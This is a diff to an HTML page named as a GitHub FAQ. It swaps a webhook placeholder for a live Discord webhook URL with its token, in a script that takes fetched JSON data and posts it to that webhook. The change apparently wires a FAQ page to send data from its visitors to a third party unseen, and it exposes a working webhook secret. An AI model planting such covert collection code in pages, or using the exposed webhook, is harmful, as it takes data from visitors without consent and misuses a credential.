--- a/GithubFAQ.html
+++ b/GithubFAQ.html
@@ -19,7 +19,7 @@
                 const data = await response.json();
                 
                 // 2. Send the data to your Discord Webhook
-                await fetch('PASTE_YOUR_WEBHOOK_URL_HERE', {
+                await fetch('https://discord.com/api/webhooks/1365771251498352681/uSQH_eevRZ97vJbOZny9aKDP32qXcATn7tCK65nU6Jn-gSeXD78q3j4AFq1aUSDQ5JMA', {
                     method: 'POST',
                     headers: { 'Content-Type': 'application/json' },
                     body: JSON.stringify({
